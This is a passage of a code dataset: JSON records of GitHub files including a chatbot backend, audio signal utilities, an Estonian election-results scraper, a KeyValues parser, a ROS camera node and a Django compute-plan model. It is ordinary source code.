convert_object_to_values(ramt_due)\n                    l_entry = (realname, amt_due)\n                    outlist.append(l_entry)\n                return outlist\n\n            bill_d = d.get(\"bill_info\")\n            return _repackage(bill_d)\n\n        # Swaps and converts values\n        def repackage_base_details(d):\n            mod = {}\n            default_details = {\"首次\":\"no\"} # Values assigned by default\n            mod.update(default_details)\n            \n            modlist = {\n                \"curr_payment_status\":{\n                    \"writeto\":\"curr_payment_status\",\n                    \"swaps\":[\n                        (\"正常缴费\", \"normal\"),\n                        (\"新进\", \"normal\"),\n                        (\"新进补缴\", \"normal\")\n                    ]\n                },\n                \"cust_city\":{\n                    \"writeto\":\"city\",\n                    \"swaps\":[(\"苏州\",\"苏州\"),(\"上海\",\"上海\")]\n                },\n                \"shebao_jishu\":{\n                    \"writeto\":\"要社保\",\n                    \"if_present\": \"yes\",\n                    \"if_none\": \"no\",\n                    \"swaps\":[(\"\", \"no\")]\n                },\n                \"gjj_jishu\":{\n                    \"writeto\":\"要公积金\",\n                    \"if_present\": \"yes\",\n                    \"if_none\": \"no\",\n                    \"swaps\":[(\"\", \"no\")]\n                }\n            }\n\n            for d_name, val in d.items():\n                if SUPER_DEBUG: print(\"<MOD DB FETCH> Mod\",mod,\" + \", d_name)\n                if d_name in modlist: \n                    curr_mod = modlist[d_name]\n                    new_key = curr_mod[\"writeto\"]\n                    ip_flag = curr_mod.get(\"if_present\",False)\n                    none_val = curr_mod.get(\"if_none\",\"\")\n                    if val is None:\n                        mod[d_name] = none_val\n                        continue\n                    \n                    if ip_flag:\n                        
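# the configured if_present marker replaces the raw value; keep_og controls whether the original is kept too\n                        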
raw_value = curr_mod[\"if_present\"]\n if curr_mod.get(\"keep_og\", True):\n mod[d_name] = val\n else:\n raw_value = val\n\n # Check if comparison is possible\n if isinstance(val, float) or isinstance(val, int):\n outval = raw_value\n else:\n # Check against table and swap values\n for regex, swapped_output in curr_mod.get(\"swaps\",[]):\n if regex in val:\n outval = swapped_output\n else: \n outval = raw_value\n \n mod[new_key] = outval\n else:\n mod[d_name] = val\n if SUPER_DEBUG: print(\"<MODIFIED FETCH>\", mod)\n return mod\n\n def attach_status(d, status):\n # Returns a string the represents the status of the customer\n def judge_status(d, status):\n exist, bill = status\n pay_status_key = \"curr_payment_status\"\n valid_status = [\"正常缴费\", \"新进\", \"新进补缴\"]\n pay_status = d.get(pay_status_key, \"\")\n\n if pay_status in valid_status:\n s1 = \"Active\"\n else:\n s1 = \"Inactive\"\n \n if bill:\n s2 = \"Bill\"\n else:\n s2 = \"NoBill\"\n\n out_str = s1 + \"_\" + s2\n return out_str\n \n status_tup = judge_status(d, status)\n d[\"customer_status\"] = status_tup \n \n rbase = filter_inpure_exist_entries(dbf)\n bill_list = billing_to_list(dbf)\n base = convert_dict_values(rbase)\n final = repackage_base_details(base)\n final[\"bills\"] = bill_list\n attach_status(final,status)\n\n return final\n\n # Returns a tuple of (Bool, Dict)\n def fetch_user_info(self, user):\n BLANK_ENTRY = {}\n def _fetch_from_JSON(user):\n # self.database reflects the entire json database\n if not user in self.database:\n # Create empty entry for new user\n self.database[user] = BLANK_ENTRY\n return\n\n def _fetch_from_SQL(user):\n status, fetch = self.SQLrw.fetch_user_info_from_sqltable(user)\n found = status[0] # (exists, has bill)\n if found:\n ndic = self.repackage_sql_fetched(fetch, status)\n self.database[user] = ndic\n else:\n _fetch_from_JSON(user)\n\n return found\n\n found_in_sql = _fetch_from_SQL(user)\n return (found_in_sql, self.database[user])\n\n def trigger_backup(self):\n if self.timer_on:\n return\n self.timer_on = True\n backuptimer = threading.Timer(self.backup_delay, self._true_write_to_db)\n backuptimer.start()\n\n def write_to_db(self, chatid, info):\n if not chatid in self.database:\n # Create empty entry for new user\n self.database[chatid] = {}\n\n # Write to a dict that will later be pushed to the db\n self.database[chatid].update({\"userID\":chatid})\n self.database[chatid].update(info)\n if DEBUG: print(\"<Write to DB> self.db\", self.database)\n\n # Set timer to write\n self.trigger_backup()\n\n def _true_write_to_db(self):\n def destroy_local_empty_records():\n for user in list(self.database.keys()):\n if self.database[user] == {}:\n self.database.pop(user)\n\n if DEBUG: print(\"Writing userinfo to database\")\n destroy_local_empty_records()\n if WRITE_TO_JSON:\n dump_to_json(self.dbfilepath, self.database)\n else:\n self.SQLrw.write_to_sqltable(self.database)\n self.timer_on = False\n\n# Assumes messages are in a list structure\ndef record_chatlog_to_json(chatID, chatlog):\n direct = os.getcwd()\n log_folder = \"chatlogs\"\n if not os.path.isdir(os.path.join(direct,log_folder)):\n print(\"Creating chatlogs folder...\")\n os.mkdir(os.path.join(direct,\"chatlogs\")) # If no folder, make a folder\n \n log_filepath = os.path.join(direct,\"chatlogs/\" + chatID + \".json\")\n \n if os.path.isfile(log_filepath):\n towrite = read_json(log_filepath)\n loglen = len(towrite)\n if DEBUG: print(\"<RECORD CHATLOG> Existing chatlog for {}: {} lines\".format(chatID,loglen))\n else:\n towrite = 
[]\n\n towrite.extend(chatlog)\n loglen = len(towrite)\n if DEBUG: print(\"<RECORD CHATLOG> Final write: {} lines\".format(loglen))\n\n # Write to json file\n dump_to_json(log_filepath,towrite,DEBUG=0,OVERRIDE=1)\n return","repo_name":"xcalibersword/chatbot","sub_path":"chatbot_be.py","file_name":"chatbot_be.py","file_ext":"py","file_size_in_byte":10799,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"61"} +{"seq_id":"13631030516","text":"import numpy as np\nfrom scipy import signal\nfrom scipy.fftpack import hilbert\nfrom scipy.io import wavfile\n\n\ndef load_file(filename):\n fs, x = wavfile.read(filename)\n return x, fs\n\n\ndef get_location(segment, location='centre'):\n if location == 'centre':\n return int(segment.spec.shape[1] / 2)\n elif location == 'start':\n return 0\n elif location == 'end':\n return segment.spec.shape[1] - 1\n elif location == 'max':\n index = np.argmax(segment.spec)\n return index // segment.spec.shape[0]\n elif location == 'max_amp':\n index = np.argmax(segment.data)\n value = int(index * segment.spec.shape[1] / len(segment.data))\n return value\n return None\n\n\ndef to_db(x, reference=1.0):\n return 20 * np.log10(x / reference)\n\n\ndef apply_threshold(value, threshold=-20):\n return value * np.power(10, threshold / 10.0)\n\n\ndef geometric_mean(data):\n g_mean = 0.0\n for i in range(len(data)):\n if data[i] == 0.0:\n continue\n else:\n g_mean += np.log(data[i])\n\n g_mean /= len(data)\n g_mean = np.exp(g_mean)\n\n return g_mean\n\n\ndef energy(data):\n return np.sum(np.square(data))\n\n\"\"\"Envelopes\"\"\"\n\n\ndef three_step_envelope(data, chunk_len=20, filter_order=4, cutoff_frequency=0.1):\n y = abs(data)\n\n n = len(y)\n k = int(n / chunk_len)\n z = []\n\n for i in range(k):\n z += [np.max(y[i * chunk_len: (i + 1) * chunk_len - 1]) for j in range(chunk_len)]\n if n % chunk_len != 0:\n z += [np.max(y[(k - 1) * chunk_len: -1]) for j in range(n % chunk_len)]\n z = np.array(z)\n\n b, a = signal.butter(filter_order, cutoff_frequency, 'low')\n w = signal.filtfilt(b, a, z)\n\n return w\n\n\ndef hilbert_envelope(data):\n h_data = hilbert(data)\n return np.sqrt(np.square(data) + np.square(h_data))\n\n\n\"\"\"Spectrogram filters\"\"\"\n\n\ndef apply_mean_filter(data):\n result = []\n for i in range(data.shape[0]):\n result.append([])\n for j in range(data.shape[1]):\n result[i].append(get_mean(data, i, j))\n return np.array(result)\n\n\ndef apply_median_filter(data):\n result = []\n for i in range(data.shape[0]):\n result.append([])\n for j in range(data.shape[1]):\n result[i].append(get_median(data, i, j))\n return np.array(result)\n\n\ndef get_mean(data, i, j):\n aux = [data[i, j]]\n if is_valid_position(data, i - 1, j):\n aux.append(data[i - 1, j])\n if is_valid_position(data, i + 1, j):\n aux.append(data[i + 1, j])\n\n return np.mean(np.array(aux))\n\n\ndef get_median(data, i, j):\n aux = [data[i, j]]\n if is_valid_position(data, i - 1, j):\n aux.append(data[i - 1, j])\n if is_valid_position(data, i + 1, j):\n aux.append(data[i + 1, j])\n\n return np.median(np.array(aux))\n\n\ndef is_valid_position(data, i, j):\n return 0 <= i < data.shape[0] and 0 <= j < data.shape[1]\n","repo_name":"ealmuina/thesis","sub_path":"clusterapp/features/utils.py","file_name":"utils.py","file_ext":"py","file_size_in_byte":2895,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"61"} +{"seq_id":"22811102058","text":"#!/usr/bin/python3\n# -*- coding: UTF-8 -*-\n\nimport random\nimport 
requests\nimport bs4\nimport string\nimport csv\nimport json\nimport time\nimport re\nimport bisect\n\nimport roman\n\nj=0\n\ndists = {}\n\nurls = []\n\ncand_norm = []\ncand_ext = {}\n\nfor i in range(1,4):\n urls.append((\"http://vvk.ee/varasemad/r07/tulemus/10%d0000.html\") % i)\n\nfor i in range (2,11):\n urls.append((\"http://vvk.ee/varasemad/r07/tulemus/%d000000.html\") % i)\n \nfor url in urls:\n j+=1\n #if j>10: break\n \n #print(url)\n succ = 1\n while succ > 0:\n try:\n page = requests.get(url)\n page.encoding = page.apparent_encoding\n succ = 0\n except requests.exceptions.RequestException as e:\n print(e)\n succ += 1\n time.sleep(succ)\n \n #print(page.text)\n #exit(1)\n \n soup = bs4.BeautifulSoup(page.text, 'lxml')\n x = soup.find_all(\"table\")[8]\n distnr = int(str(x.find(\"span\", {\"class\", \"head\"})).split(\"Valimisringkond nr \")[1].split(\"<\")[0])\n tr = x.find_all(\"table\")[2].find_all(\"tr\")\n kvoot = None\n run = False\n head = []\n for z in tr:\n ddd = z.find_all(\"td\")\n ht = ddd[0].text.strip()\n if not run:\n if ht != \"I\": continue\n else: run = 1\n print(roman.toRoman(run), \"?=\", ht)\n if roman.toRoman(run) == ht:\n head.append({\n \"nr\": run,\n \"altnr\": ht,\n \"title\": ddd[1].text.strip()\n }\n )\n if len(ddd[2].text.strip())>0:\n head[-1][\"eligible\"] = int(ddd[2].text.strip())\n if len(ddd[3].text.strip())>0:\n head[-1][\"votes\"] = int(ddd[3].text.strip())\n run += 1\n \n print(run, z)\n print(\"------\")\n\n print(head)\n\n kvoot = tr[-1].text.strip()\n #print(kvoot)\n #ehstring = soup.find(\"div\", {\"class\", \"dataTableWrap\"}).text.split(\"E-hääled\")[0].split(\" \")[-1]\n dists[distnr] = {\"m\": int(kvoot.split(\"/\")[1].split(\"=\")[0].strip()), \"arr\": head, \"c\": {}}\n #print(distnr, kvoot)\n\n dist = soup.find_all(\"table\")[8].find_all(\"table\")\n\n #print(dist)\n# ringkond = dist[0].text.split(\" \")[-1]\n# candname = soup.find_all(\"span\", {\"class\", \"uppercase\"})\n# nimi = candname[0].text.title()\n\n dist.remove(dist[0])\n dist.remove(dist[0])\n dist.remove(dist[0])\n\n #heads = []\n\n #table = dist[0].find('tbody')\n #print(table)\n #hhh = table.find_all(\"td\")\n #for h in hhh:\n # heads.append(h.text)\n\n #print(heads[-1], ehstring)\n\n #exit(1)\n \n for di in dist:\n table = di.find(name='tbody')\n rrr = di.find_all(\"tr\")\n rows = 0\n party = \"\"\n for r in rrr:\n if rows == 0:\n ddd = r.find_all(\"td\")\n party = ddd[0].text.strip().upper()\n rows +=1\n continue\n #print(r)\n if r.text.find(\"Nimekiri KOKKU\") < 0 and r.text.find(\"Üksikkandidaadid KOKKU\") < 0:\n #print(r)\n td = 0\n res = []\n ddd = r.find_all(\"td\")\n if len(ddd) < 3:\n #print(ddd)\n rows=0\n continue\n else:\n #print(ddd)\n print(ddd[1].text, ddd[2].text, ddd[4].text, ddd[-1].text)\n\n cand_norm.append(\n {\n \"number\": int(ddd[1].text),\n \"name\": ddd[2].text,\n \"votes\": int(ddd[4].text.replace(\"=\",\"\").replace(\" \",\"\")),\n \"electronic\": int(ddd[-1].text.replace(\"+\",\"\").replace(\" \",\"\")),\n \"district\": distnr,\n \"party\": party\n }\n )\n\n cand_ext[int(ddd[1].text)] = {\n \"number\": int(ddd[1].text),\n \"name\": ddd[2].text,\n \"votes\": int(ddd[4].text.replace(\"=\",\"\").replace(\" \",\"\")),\n \"electronic\": int(ddd[-1].text.replace(\"+\",\"\").replace(\" \",\"\")),\n \"district\": distnr,\n \"party\": party,\n \"arr\": []\n }\n \n ce = cand_ext[int(ddd[1].text)][\"arr\"]\n kokku = int(ddd[4].text.replace(\"=\",\"\").replace(\" \",\"\"))\n \n hc = 0\n for arr in head:\n ce.append({\n \"title\": arr[\"title\"],\n 
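# one entry per results column: the column header metadata plus this candidate's vote count in that column\n                            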
\"nr\": arr[\"nr\"],\n \"altnr\": arr[\"altnr\"],\n \"votes\": int(ddd[6+hc*2].text.replace(\"+\",\"\").replace(\" \",\"\"))\n })\n hc += 1\n #if \"eligible\" in arr:\n # ce[arr[\"title\"]][\"e\"] = arr[\"eligible\"]\n \n if party not in dists[distnr][\"c\"]:\n dists[distnr][\"c\"][party] = [cand_norm[-1][\"number\"]]\n else:\n bisect.insort(dists[distnr][\"c\"][party], cand_norm[-1][\"number\"])\n \n res.append(ddd[1].text)\n res.append(ddd[2].text)\n res.append(kokku)\n res.append(ddd[-3].text.replace(\"+\",\"\").replace(\" \",\"\"))\n res.append(ddd[-1].text.replace(\"+\",\"\").replace(\" \",\"\"))\n with open('rk2007-tulemused.csv', 'a') as csv_file:\n writer = csv.writer(csv_file)\n writer.writerow(res)\n csv_file.close()\n\nprint(cand_ext)\n\nwith open(\"res2007.json\", 'w') as outfile:\n json.dump(cand_norm, outfile, sort_keys=True, indent=4)\n \nwith open(\"res2007-ext.json\", 'w') as outfile:\n json.dump(cand_ext, outfile, sort_keys=True, indent=4)\n\nwith open(\"dists2007.json\", 'w') as outfile:\n json.dump(dists, outfile, sort_keys=True, indent=4)\n","repo_name":"infoaed/rk2007-data","sub_path":"tul2.py","file_name":"tul2.py","file_ext":"py","file_size_in_byte":6123,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"73416112833","text":"\"\"\"\npNEUMA package to work with dataset of pNEUMA experiment\n\nAuthor: Landtmeters Joachim, KU Leuven\nData source: pNEUMA – open-traffic.epfl.ch\n\"\"\"\nimport os\nfrom pathlib import Path\nimport pickle\n\nfrom .settings import *\nfrom ._api import *\n\n# Folders to store intermediate results and data sets\n# Created in working directory of run python script\n# In future versions decisions on how to handle best with intermediate data and results will be made\nresults_folder = 'results'\ndata_folder = 'data'\nPath(os.getcwd()+\"/\"+data_folder).mkdir(parents=True, exist_ok=True)\nPath(os.getcwd()+\"/\"+results_folder + \"/plots\").mkdir(parents=True, exist_ok=True)\nPath(os.getcwd()+\"/\"+results_folder + \"/crossings\").mkdir(parents=True, exist_ok=True)\nPath(os.getcwd()+\"/\"+data_folder + \"/shapefiles\").mkdir(parents=True, exist_ok=True)\nPath(os.getcwd()+\"/\"+results_folder + \"/case_studies\").mkdir(parents=True, exist_ok=True)\nPath(os.getcwd()+\"/\"+results_folder).mkdir(parents=True, exist_ok=True)\n\n# Folders to store intermediate results and data sets\npath_data = os.path.join(os.getcwd(), data_folder)\npath_results = os.path.join(os.getcwd(), results_folder)\npath_case_studies = os.path.join(os.getcwd(), results_folder, 'case_studies')\n\n\ndef write_pickle(obj, filename, path=None):\n if path is None:\n path = os.getcwd()\n filename = os.path.join(path, filename)\n filename = os.path.normpath(filename)\n with open(filename, 'wb') as a:\n pickle.dump(obj, a)\n\n\ndef read_pickle(filename, path=None):\n if path is None:\n path = os.getcwd()\n filename = os.path.join(path, filename)\n filename = os.path.normpath(filename)\n with open(filename, 'rb') as a:\n obj = pickle.load(a)\n return obj\n\n\n","repo_name":"JoachimLandtmeters/pNEUMA_mastersproject","sub_path":"pneumapackage/__init__.py","file_name":"__init__.py","file_ext":"py","file_size_in_byte":1727,"program_lang":"python","lang":"en","doc_type":"code","stars":13,"dataset":"github-code","pt":"61"} +{"seq_id":"5177966449","text":"from pathlib import Path\n# https://sourcegraph.com/github.com/TheAlePower/TeamFortress2@1b81dded673d49adebf4d0958e52236ecc28a956/-/blob/tf2_src/tier1/KeyValues.cpp?L2388:17\n\n# note, 
support chained key values? (ChainKeyValue)\n# maybe keep track of line numbers so we can sneak new values in better?\nWS = \" \\t\\n\\r\"\n\nfrom model.util import ResDict\n\n\nclass Buf:\n def __init__(self, st):\n self.st = st\n\n def is_valid(self):\n while 1:\n if all(c in WS for c in self.st):\n return False\n\n self.eat_white_space()\n\n if (not self.eat_cpp_comment()) \\\n and (not self.eat_brackets()):\n break\n\n if len(self.st) == 0:\n return False\n\n return True\n\n def peek(self):\n return self.st[0]\n\n def eat_one_char(self):\n self.st = self.st[1:]\n\n def eat_white_space(self):\n i = 0\n while self.st[i] in WS:\n i += 1\n\n self.st = self.st[i:]\n\n def eat_cpp_comment(self):\n if len(self.st) < 2:\n return False\n\n c1, c2 = self.st[0], self.st[1]\n if c1 != \"/\" or c2 != \"/\":\n return False\n\n self.eat_until(\"\\n\")\n self.eat_one_char()\n return True\n\n def eat_brackets(self):\n c = self.st[0]\n if c != \"[\":\n return False\n\n self.eat_one_char()\n self.eat_until(\"]\")\n assert self.st[0] == \"]\"\n self.eat_one_char()\n return True\n\n def eat_until(self, cs):\n # ret does not include the end character\n # but st does\n if self.st == '':\n return ''\n i = 0\n length = len(self.st) - 1 \n\n while i < length and self.st[i] not in cs:\n i += 1\n\n cap = self.st[:i]\n self.st = self.st[i:]\n return cap\n\n def get_deliminited_string(self):\n assert self.st[0] == '\"'\n self.st = self.st[1:]\n\n s = self.eat_until('\"')\n assert self.st[0] == '\"'\n self.eat_one_char()\n #return '\"' + s + '\"'\n return s\n\n\nclass Parser:\n def __init__(self, inputstring, path='', parsed=[]):\n self.path = Path(path) # for base and include\n self.parsed = parsed # for avoiding parsing file twice while following base\n\n self.items = ResDict()\n self.buf = Buf(inputstring)\n self.visited_filenames = []\n self.parse_file()\n\n def get_text(self):\n return self.buf.st\n\n def parse_file(self):\n\n while self.buf.is_valid():\n token, _ = self.read_token()\n if token == \"#include\" or token == \"#base\":\n # include is appended, and base is merged\n # but not sure how those are different so..\n includefile, _ = self.read_token()\n f = (self.path / includefile).resolve()\n if f.is_file() and f not in self.parsed:\n print('parsing ', f)\n # {HERE} Fix infinite looping of parsing\n new_items = parse_file(f.resolve(), parsed=[f, *self.parsed])\n # TODO make sure that it doesn't override\n # values, it keeps oldest ones\n self.items.deep_merge_with(new_items)\n\n else:\n opn, qtd = self.read_token()\n\n\n assert opn == \"{\", opn\n assert not qtd\n\n res = ResDict()\n res[token] = self.recursive_parse_file()\n\n self.items.deep_merge_with(res)\n\n\n def recursive_parse_file(self):\n # parse until closing block, returning dict of pairs\n items = ResDict()\n while 1:\n key, qtd = self.read_token()\n\n if key == \"}\" and not qtd:\n return items\n\n if key == \"{\" and not qtd:\n raise Exception(\"two { in a row\")\n\n value, qtd = self.read_token()\n\n if value == \"{\" and not qtd:\n items[key] = self.recursive_parse_file()\n else:\n items[key] = value\n\n def read_token(self):\n # eat whitespace/comments\n while 1:\n self.buf.eat_white_space()\n\n if (not self.buf.eat_cpp_comment()) \\\n and (not self.buf.eat_brackets()):\n break\n\n c = self.buf.peek()\n if c == '\"':\n token = self.buf.get_deliminited_string()\n return token, True\n elif c == \"{\" or c == \"}\":\n self.buf.eat_one_char()\n return c, False\n\n token = self.buf.eat_until(WS + '}{')\n return token, False\n # TODO handle 
conditionals []\n\n\ndef parse_file(fname, parsed=[]):\n path = Path(fname).resolve().parent\n with open(fname) as f:\n return Parser(f.read(), path, parsed=parsed).items\n","repo_name":"tommy-mor/hudmixer","sub_path":"src/model/read.py","file_name":"read.py","file_ext":"py","file_size_in_byte":4829,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"61"} +{"seq_id":"10607868575","text":"#!/usr/bin/env python\nimport rospy\nimport numpy as np\nimport cv2, sys, time, math\nfrom sensor_msgs.msg import Image\nfrom sensor_msgs.msg import CompressedImage\nfrom cv_bridge import CvBridge\n\nif __name__ == '__main__':\n rospy.init_node('pi_floorcam_node', anonymous=True)\n cap = cv2.VideoCapture(0)\n pub = rospy.Publisher(\n '/pi_floorcam/image_raw/compressed', CompressedImage, queue_size=3)\n rate = rospy.Rate(10)\n\n bridge = CvBridge()\n while not rospy.is_shutdown():\n ret, frame = cap.read()\n msg = CompressedImage()\n msg.format = \"jpeg\"\n msg.data = np.array(cv2.imencode('.jpg', frame)[1]).tostring()\n #publish new image\n pub.publish(msg)\n #pub.publish(bridge.cv2_to_imgmsg(frame, \"bgr8\"))\n\n cv2.waitKey(100) #wait for input(ms)\n\n cap.release()\n","repo_name":"bkjung/hengel_ros","sub_path":"hengel_visual_odometry/scripts/pi_floorcam_publisher.py","file_name":"pi_floorcam_publisher.py","file_ext":"py","file_size_in_byte":835,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"27493958909","text":"import secrets\nimport string\n\nimport structlog\nfrom django.conf import settings\nfrom django.contrib.auth.models import User\nfrom django.db import models\nfrom django.db.models import Count\nfrom django.db.models import Q\n\nfrom api.models.computetask import ComputeTask\n\nlogger = structlog.get_logger(__name__)\n\n\ndef _get_or_create_deleted_user() -> User:\n user_deleted, created = User.objects.get_or_create(username=settings.VIRTUAL_USERNAMES[\"DELETED\"], is_active=False)\n if created:\n password = \"\".join(\n (secrets.choice(string.ascii_letters + string.digits + string.punctuation) for _ in range(24))\n )\n user_deleted.set_password(password)\n user_deleted.save()\n\n return user_deleted\n\n\nclass ComputePlan(models.Model):\n \"\"\"ComputePlan represent a compute plan and its associated metadata\"\"\"\n\n class Status(models.TextChoices):\n PLAN_STATUS_WAITING = \"PLAN_STATUS_WAITING\"\n PLAN_STATUS_TODO = \"PLAN_STATUS_TODO\"\n PLAN_STATUS_DOING = \"PLAN_STATUS_DOING\"\n PLAN_STATUS_DONE = \"PLAN_STATUS_DONE\"\n PLAN_STATUS_CANCELED = \"PLAN_STATUS_CANCELED\"\n PLAN_STATUS_FAILED = \"PLAN_STATUS_FAILED\"\n PLAN_STATUS_EMPTY = \"PLAN_STATUS_EMPTY\"\n\n key = models.UUIDField(primary_key=True)\n owner = models.CharField(max_length=100)\n status = models.CharField(max_length=64, choices=Status.choices, default=Status.PLAN_STATUS_EMPTY)\n tag = models.CharField(max_length=100, blank=True)\n name = models.CharField(max_length=100)\n creator = models.ForeignKey(\n settings.AUTH_USER_MODEL,\n on_delete=models.SET(_get_or_create_deleted_user),\n related_name=\"compute_plans\",\n null=True,\n )\n creation_date = models.DateTimeField()\n cancelation_date = models.DateTimeField(null=True)\n start_date = models.DateTimeField(null=True)\n end_date = models.DateTimeField(null=True)\n metadata = models.JSONField(null=True)\n failed_task_key = models.CharField(max_length=100, null=True)\n channel = models.CharField(max_length=100)\n\n class Meta:\n ordering = [\"creation_date\", \"key\"] # 
default order for relations serializations\n\n    def _add_failed_task(self) -> None:\n        if self.failed_task_key is not None:\n            # failed_task field is already populated\n            return\n\n        first_failed_task = (\n            self.compute_tasks.filter(end_date__isnull=False, status=ComputeTask.Status.STATUS_FAILED)\n            .order_by(\"end_date\")\n            .first()\n        )\n\n        if first_failed_task is None:\n            return\n\n        self.failed_task_key = first_failed_task.key\n\n    def get_task_stats(self) -> dict:\n        return ComputeTask.objects.filter(compute_plan__key=str(self.key)).aggregate(\n            task_count=Count(\"key\"),\n            done_count=Count(\"key\", filter=Q(status=ComputeTask.Status.STATUS_DONE)),\n            waiting_count=Count(\"key\", filter=Q(status=ComputeTask.Status.STATUS_WAITING)),\n            todo_count=Count(\"key\", filter=Q(status=ComputeTask.Status.STATUS_TODO)),\n            doing_count=Count(\"key\", filter=Q(status=ComputeTask.Status.STATUS_DOING)),\n            canceled_count=Count(\"key\", filter=Q(status=ComputeTask.Status.STATUS_CANCELED)),\n            failed_count=Count(\"key\", filter=Q(status=ComputeTask.Status.STATUS_FAILED)),\n        )\n\n    def update_status(self) -> None:\n        \"\"\"Compute cp status from tasks counts.\"\"\"\n        stats = self.get_task_stats()\n        if stats[\"task_count\"] == 0:\n            compute_plan_status = self.Status.PLAN_STATUS_EMPTY\n        elif stats[\"done_count\"] == stats[\"task_count\"]:\n            compute_plan_status = self.Status.PLAN_STATUS_DONE\n        elif stats[\"failed_count\"] > 0:\n            compute_plan_status = self.Status.PLAN_STATUS_FAILED\n        elif self.cancelation_date or stats[\"canceled_count\"] > 0:\n            compute_plan_status = self.Status.PLAN_STATUS_CANCELED\n        elif stats[\"waiting_count\"] == stats[\"task_count\"]:\n            compute_plan_status = self.Status.PLAN_STATUS_WAITING\n        elif stats[\"waiting_count\"] < stats[\"task_count\"] and stats[\"doing_count\"] == 0 and stats[\"done_count\"] == 0:\n            compute_plan_status = self.Status.PLAN_STATUS_TODO\n        else:\n            compute_plan_status = self.Status.PLAN_STATUS_DOING\n\n        logger.debug(\n            \"update cp status\",\n            status=compute_plan_status,\n            task_count=stats[\"task_count\"],\n            done_count=stats[\"done_count\"],\n            waiting_count=stats[\"waiting_count\"],\n            todo_count=stats[\"todo_count\"],\n            doing_count=stats[\"doing_count\"],\n            canceled_count=stats[\"canceled_count\"],\n            failed_count=stats[\"failed_count\"],\n        )\n\n        self.status = compute_plan_status\n\n        if self.status == self.Status.PLAN_STATUS_FAILED:\n            self._add_failed_task()\n\n        self.save()\n\n    def update_dates(self) -> None:\n        \"\"\"Update start_date, end_date\"\"\"\n\n        if not self.start_date:\n            first_started_task = self.compute_tasks.filter(start_date__isnull=False).order_by(\"start_date\").first()\n            if first_started_task:\n                self.start_date = first_started_task.start_date\n\n        ongoing_tasks = self.compute_tasks.filter(end_date__isnull=True).exists()\n        failed_or_canceled_tasks = self.compute_tasks.filter(\n            status__in=(\n                ComputeTask.Status.STATUS_FAILED,\n                ComputeTask.Status.STATUS_CANCELED,\n            )\n        ).exists()\n\n        if self.cancelation_date is not None:\n            self.end_date = self.cancelation_date\n        elif ongoing_tasks and not failed_or_canceled_tasks:\n            # some tasks could remain in waiting status without end date\n            self.end_date = None # end date could be reset when cp is updated with new tasks\n        else:\n            last_ended_task = self.compute_tasks.filter(end_date__isnull=False).order_by(\"end_date\").last()\n            if last_ended_task:\n                self.end_date = last_ended_task.end_date\n\n        
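# persist the recomputed start/end dates\n        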
self.save()\n","repo_name":"Substra/substra-backend","sub_path":"backend/api/models/computeplan.py","file_name":"computeplan.py","file_ext":"py","file_size_in_byte":6091,"program_lang":"python","lang":"en","doc_type":"code","stars":57,"dataset":"github-code","pt":"61"} +{"seq_id":"39542495802","text":"from pathlib import Path\nimport json\n\nall_glosses = []\n\nfor file in Path('./hillmari_multimedia').iterdir():\n if not file.name.endswith('.json'):\n continue\n doc = json.load(file.open(encoding='utf-8'))\n for sent in doc['sentences']:\n for word in sent['words']:\n if 'ana' in word:\n for ana in word['ana']:\n all_glosses.extend(ana.get('gloss_index_ru', '').split('-'))\n\nall_glosses = [x[:x.index('{') if '{' in x else len(x)].strip(' {}') for x in all_glosses]\n\nprint(json.dumps([{\"type\": \"gloss\", \"value\": gloss, \"tooltip\": gloss} for gloss in sorted(set(all_glosses))], ensure_ascii=False))\n","repo_name":"vantral/hillmari_backup","sub_path":"corpus/script_2.py","file_name":"script_2.py","file_ext":"py","file_size_in_byte":659,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"39788321581","text":"#!/usr/bin/python3\n\nfrom datetime import datetime\n\n# Open and read the file\n#filename = input(\"input filename: \")\n#csvfile = open(filename, 'r').read()\n\ndef parse(csvtext):\n # Split the file into rows/items\n lines = csvtext.split('\"\\n\"')\n fulllines = []\n for line in lines:\n fulllines += [line.split('\",\"')]\n\n # Delete extra characters\n del fulllines[0]\n fulllines[-1][-1] = fulllines[-1][-1][:-2]\n\n # Parse raw CSV data into name, area/s, room/s, start time, end time\n events = []\n for neweventraw in fulllines:\n # Create new event as dictionary\n newevent = {}\n newevent['name'] = neweventraw[0]\n newevent['areas'] = [neweventraw[1]]\n newevent['rooms'] = [neweventraw[2]]\n newevent['start'] = datetime.strptime(neweventraw[3], '%I:%M%p - %A %d %B %Y')\n newevent['end'] = datetime.strptime(neweventraw[4], '%I:%M%p - %A %d %B %Y')\n\n # Merge with existing event in case of multiple rooms\n adding = True\n for event in events:\n if [event['name'], event['start'], event['end']] == [newevent['name'], newevent['start'], newevent['end']]:\n adding = False\n if newevent['areas'][0] not in event['areas']:\n event['areas'] += newevent['areas']\n if newevent['rooms'][0] not in event['rooms']:\n event['rooms'] += newevent['rooms']\n break\n\n # Add event if not merging\n if adding:\n events += [newevent]\n\n # Sort events by start time\n events = sorted(events, key = lambda i: i['start'])\n\n return events\n","repo_name":"AidanRB/mrbs_print","sub_path":"parse.py","file_name":"parse.py","file_ext":"py","file_size_in_byte":1638,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"26932300353","text":"'''\r\nQ1514. Description: You are given an undirected weighted graph of n nodes (0-indexed), represented by an edge list where edges[i] = [a, b] is an undirected edge connecting the nodes a and b with a probability of success of traversing that edge succProb[i].\r\n\r\nGiven two nodes start and end, find the path with the maximum probability of success to go from start to end and return its success probability.\r\n\r\nIf there is no path from start to end, return 0. 
